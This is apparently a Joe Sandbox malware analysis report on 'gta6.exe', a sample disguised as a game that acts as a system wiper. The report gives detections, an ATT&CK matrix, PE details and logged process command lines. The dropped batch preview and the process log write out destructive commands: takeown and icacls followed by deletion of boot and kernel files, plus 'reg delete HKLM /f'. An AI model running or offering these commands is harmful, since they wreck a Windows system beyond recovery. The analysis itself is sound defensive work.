Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_000000014000D9C4

Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_000000014000C4D0 RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler,		0_2_000000014000C4D0
Source: C:\Users\user\Desktop\gta6.exe	Code function: 0_2_000000014001F888 RtlAddVectoredExceptionHandler,		0_2_000000014001F888

Source: C:\Users\user\Desktop\gta6.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete HKLM /f	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Native API	1 Scripting	11 Process Injection	1 Modify Registry	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Services File Permissions Weakness	1 Services File Permissions Weakness	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Services File Permissions Weakness	LSA Secrets	11 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
gta6.exe	37%	ReversingLabs
gta6.exe	100%	Avira	HEUR/AGEN.1339739
gta6.exe	100%	Joe Sandbox ML

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544786
Start date and time:	2024-10-29 18:41:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gta6.exe
Detection:	MAL
Classification:	mal72.expl.winEXE@46/2@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 27 Number of non-executed functions: 37
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, smss.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeleteKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: gta6.exe

Process:	C:\Users\user\Desktop\gta6.exe
File Type:	ASCII text, with very long lines (331), with CRLF line terminators
Category:	dropped
Size (bytes):	2061
Entropy (8bit):	4.936877519380997
Encrypted:	false
SSDEEP:	24:14/otr9yRpFCXp5CDpinCHpZC2dOdfp7bCXp4nClsyp0GCnpenCR8YpCUCbp4CSX:aReX+DxHm2A1d+X7VKnxR8YU7bJSARDA
MD5:	786DBA0C5B6539CF40382E1D6A31941E
SHA1:	23DD0DFDBB1A2584744979A146346726B9577D9C
SHA-256:	0D539203223FB2A353189C36748EDBAD1C33ADE0158F72C3CA4B14DEC0AAFCDB
SHA-512:	7EA197C07AEB76B22FCF813D779A708680D98DC68E0117C46D637D88952EF686A87E329FCEC21B8D0D43860F3481611BFAB104E7390906486882890D57D3E4C3
Malicious:	false
Preview:	@shift /0..set "params=%*"..cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul \|\| ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )..cd %SystemRoot%\System32....takeown /f %SystemRoot%\System32\hal.dll /r /d y..icacls %SystemRoot%\System32\hal.dll /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\hal.dll....takeown /f %SystemRoot%\System32\winload.exe /r /d y..icacls %SystemRoot%\System32\winload.exe /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\winload.exe....takeown /f %SystemRoot%\System32\winresume.exe /r /d y..icacls %SystemRoot%\System32\winresume.exe /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\winresume.exe....takeown /f %SystemRoot%\System32\winlogon.exe /r /d y..icacls %SystemRoot%\System32\winlogon.exe /grant everyone:F /

\Device\Null

Download File

Process:	C:\Windows\System32\fsutil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	4.17699200758583
Encrypted:	false
SSDEEP:	3:QAFrf2WwFhMjn:QgL2zhMj
MD5:	870D97F130F8CDC708141C407389BE3A
SHA1:	B869CF43CD47F97E9883A9538FB157F2F79F51DC
SHA-256:	2C09238165070B4B23C709CBF1FD749E0FB645EB64B4A8B189E5E3DB2CF2EF59
SHA-512:	BFC916325F759F95C68A59AAECB3DAF4DC5BDAB9BFDC48E817BDB5CA20BAFA355BD0699668BD63420E354751DC1116F4A50949BC4ECBA8E54644BAB10FED3099
Malicious:	false
Preview:	Volume - C: is NOT Dirty..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.918912990185061
TrID:	Win64 Executable GUI (202006/5) 81.25% UPX compressed Win32 Executable (30571/9) 12.30% Win64 Executable (generic) (12005/4) 4.83% Generic Win/DOS Executable (2004/3) 0.81% DOS Executable Generic (2002/1) 0.81%
File name:	gta6.exe
File size:	56'832 bytes
MD5:	aaff8d22681e8bdee3c3ba55007f673f
SHA1:	aa94b52ee5290629165387bb0e7bdf3600e7a073
SHA256:	512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb
SHA512:	7e097d80b931aaa992b47f76c01eaa7e13c95fcc9d62d0b899216e0309563f32a6b0cb609e4540d81f8a4d3590f7fa277c124d2d6430f9409cf8f5c43f15792a
SSDEEP:	1536:T4dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNs2:T4dzVTaer344JzthRZijQ1Js
TLSH:	2843F1B797BDE8BDC02361B257CC0040BA6F262B57C4173F15A05AFFC89A2D49741752
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.........p..0G.........@.............................p.............................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140024730
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a50e815adb2cfe3e58d388c791946db8

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFFF38EAh]
dec eax
lea edi, dword ptr [esi-00017025h]
push edi
mov eax, 00022A7Fh
push eax
dec eax
mov ecx, esp
dec eax
mov edx, edi
dec eax
mov edi, esi
mov esi, 0000C703h
push ebp
dec eax
mov ebp, esp
inc esp
mov ecx, dword ptr [ecx]
dec ecx
mov eax, edx
dec eax
mov edx, esi
dec eax
lea esi, dword ptr [edi+02h]
push esi
mov al, byte ptr [edi]
dec edx
mov cl, al
and al, 07h
shr cl, 00000003h
dec eax
mov ebx, FFFFFD00h
dec eax
shl ebx, cl
mov cl, al
dec eax
lea ebx, dword ptr [esp+ebx*2-00000E78h]
dec eax
and ebx, FFFFFFC0h
push 00000000h
dec eax
cmp esp, ebx
jne 00007F8D7C90708Bh
push ebx
dec eax
lea edi, dword ptr [ebx+08h]
mov cl, byte ptr [esi-01h]
dec edx
mov byte ptr [edi+02h], al
mov al, cl
shr cl, 00000004h
mov byte ptr [edi+01h], cl
and al, 0Fh
mov byte ptr [edi], al
dec eax
lea ecx, dword ptr [edi-04h]
push eax
inc ecx
push edi
dec eax
lea eax, dword ptr [edi+04h]
inc ebp
xor edi, edi
inc ecx
push esi
inc ecx
mov esi, 00000001h
inc ecx
push ebp
inc ebp
xor ebp, ebp
inc ecx
push esp
push ebp
push ebx
dec eax
mov dword ptr [esp-10h], ecx
dec eax
mov dword ptr [esp-28h], eax
mov eax, 00000001h
dec eax
mov dword ptr [esp-08h], esi
dec esp
mov dword ptr [esp-18h], eax
mov ebx, eax
inc esp
mov dword ptr [esp-1Ch], ecx
movzx ecx, byte ptr [edi+02h]
shl ebx, cl
mov ecx, ebx
dec eax
mov ebx, dword ptr [esp+38h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x264c0	0x28c	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x4c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d000	0x10d4	UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x17000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x18000	0xe000	0xd400	4641914c8fe546eab049b77fbd27ef9b	False	0.97265625	data	7.97567805692808	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26000	0x1000	0x800	9f4b424b130ce2bf08fb606d3e6b85a2	False	0.4453125	data	4.401923963390295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x2221c	0x803	data	1.0053632374451487
RT_RCDATA	0x22a20	0x1	very short file (no magic)	9.0
RT_RCDATA	0x22a24	0xc	Non-ISO extended-ASCII text, with no line terminators	1.6666666666666667
RT_RCDATA	0x22a30	0x12	data	1.5
RT_MANIFEST	0x26220	0x2a0	XML 1.0 document, ASCII text, with very long lines (672), with no line terminators	0.5520833333333334

Imports

DLL	Import
COMCTL32.DLL	InitCommonControlsEx
GDI32.DLL	GetStockObject
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
msvcrt.dll	free
OLE32.DLL	CoInitialize
SHELL32.DLL	ShellExecuteExW
SHLWAPI.DLL	PathRemoveArgsW
USER32.DLL	SetFocus
WINMM.DLL	timeBeginPeriod

Target ID:	0
Start time:	13:42:08
Start date:	29/10/2024
Path:	C:\Users\user\Desktop\gta6.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gta6.exe"
Imagebase:	0x140000000
File size:	56'832 bytes
MD5 hash:	AAFF8D22681E8BDEE3C3BA55007F673F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:42:08
Start date:	29/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Imagebase:	0x7ff788900000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:42:08
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:42:08
Start date:	29/10/2024
Path:	C:\Windows\System32\fsutil.exe
Wow64 process (32bit):	false
Commandline:	fsutil dirty query C:
Imagebase:	0x7ff7dba00000
File size:	214'840 bytes
MD5 hash:	DE00EDA7134D3365E6074700E3008CAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:42:08
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\hal.dll /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:42:08
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:42:09
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	true
Commandline:	takeown /f C:\Windows\System32\winload.exe /r /d y
Imagebase:	0x650000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:42:09
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:42:10
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\winresume.exe /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:42:10
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:42:10
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\winlogon.exe /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:42:10
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:42:10
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\wininit.exe /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:42:10
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:42:11
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Imagebase:	0x7ff7b4ee0000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:42:11
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:42:11
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\regedit.exe /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:42:11
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:42:12
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:42:12
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:42:12
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\consent.exe /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:42:12
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:42:12
Start date:	29/10/2024
Path:	C:\Windows\System32\takeown.exe
Wow64 process (32bit):	false
Commandline:	takeown /f C:\Windows\System32\drivers /r /d y
Imagebase:	0x7ff683660000
File size:	66'560 bytes
MD5 hash:	D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:42:13
Start date:	29/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls C:\Windows\System32\drivers /grant everyone:F /t
Imagebase:	0x7ff6ae4b0000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:42:14
Start date:	29/10/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete HKLM /f
Imagebase:	0x7ff6e5600000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.6%
Total number of Nodes:	872
Total number of Limit Nodes:	31

Executed Functions

Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400126D0: TlsGetValue.KERNEL32 ref: 00000001400126E2
Part of subcall function 00000001400126D0: RtlReAllocateHeap.NTDLL ref: 0000000140012762

GetTempPathW.KERNEL32 ref: 000000014000D9F3
LoadLibraryW.KERNEL32 ref: 000000014000DA02
GetProcAddress.KERNEL32 ref: 000000014000DA1D
